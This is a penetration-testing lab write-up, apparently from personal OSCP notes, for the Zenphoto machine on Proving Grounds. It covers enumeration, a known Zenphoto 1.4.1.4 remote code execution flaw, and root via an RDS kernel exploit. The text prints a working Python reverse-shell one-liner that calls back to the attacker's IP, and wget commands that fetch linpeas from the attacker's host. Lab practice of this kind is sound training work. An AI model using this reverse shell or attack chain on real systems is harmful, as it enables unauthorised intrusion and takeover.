📚
OSCP
  • Pentesting
  • Proving Grounds practice
    • Warm up
      • Windows
        • Kevin
        • Internal
        • Metallus
      • Linux
        • ClamAV
        • Exfiltrated
        • Twiggy
    • Get to work
      • Windows
        • Slort
        • Billyboss
        • Fish
        • UT99
        • AuthBy
        • Jacko
        • Shenzi
      • Linux
        • Dibble
        • Pelican
        • Sorcerer
        • Zino
        • Zenphoto
        • Snookums
        • Nibbles
        • Chatty
        • Banzai
    • Try harder
      • Windows
        • Meathead
      • Linux
        • Sirol
        • Peppo
        • Clyde
  • Buffer overflow
    • Buffer Overflow Methodology
    • TryHackMe Practice
      • Overflow1
      • Overflow2
      • Overflow3
      • Overflow4
      • Overflow5
      • Overflow6
      • Overflow7
      • Overflow8
      • Overflow9
      • Overflow10
  • Active Directory
    • AD Authentication
      • NTLM Authentication
      • Kerberos Authentication
    • TryHackMe Practice
      • Attacktive Directory
      • Roasted
      • RazorBlack
    • PG Practice
      • Hutch
      • Vault
      • Heist
Powered by GitBook
On this page
  • Information Gathering
  • Service Enumeration
  • HTTP (Port 80)
  • Exploit
  • Privesc

Was this helpful?

  1. Proving Grounds practice
  2. Get to work
  3. Linux

Zenphoto

Writeup for Zenphoto from offsec Proving Grounds

PreviousZinoNextSnookums

Last updated 3 years ago

Was this helpful?

Information Gathering

sudo ./nmapAutomator.sh 192.168.163.41 all

Service Enumeration

HTTP (Port 80)

gobuster dir -u http://192.168.163.41/ -w /usr/share/dirb/wordlists/common.txt -t 40

We see /test and /index which is of interest.

/index

Seems like it's just a blank page.

/test

/test looks more interesting and we can see that it is powered by Zenphoto.

Let's try to see if we can find the version number.

Looks like this is running Zenphoto 1.4.1.4.

A quick google search and we found out that Zenphoto 1.4.1.4 is vulnerable to 'ajax_create_folder.php' Remote Code Execution/

Exploit

Now that we have a shell, we can use python to get a more stable reverse shell.

Payload: export RHOST="192.168.49.163";export RPORT=443;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

Privesc

Next, we can start a python SimpleHTTPServer to get LinPeas on the machine.

Attacking machine: python3 -m http.server 8000

Target machine: wget 192.168.49.163:8000/opt/PEASS-ng/linPEAS/linpeas

From linpeas, we see that there are kernel exploits for this version of the kernel.

We tried the first one, dirtycow 2, it didn't work well so we tried the second one, rds and it worked.

We can use our Python SimpleHTTPServer to get rds onto the target machine.

And we get root after running rds.

LogoZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code ExecutionExploit Database
LogoLinux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege EscalationExploit Database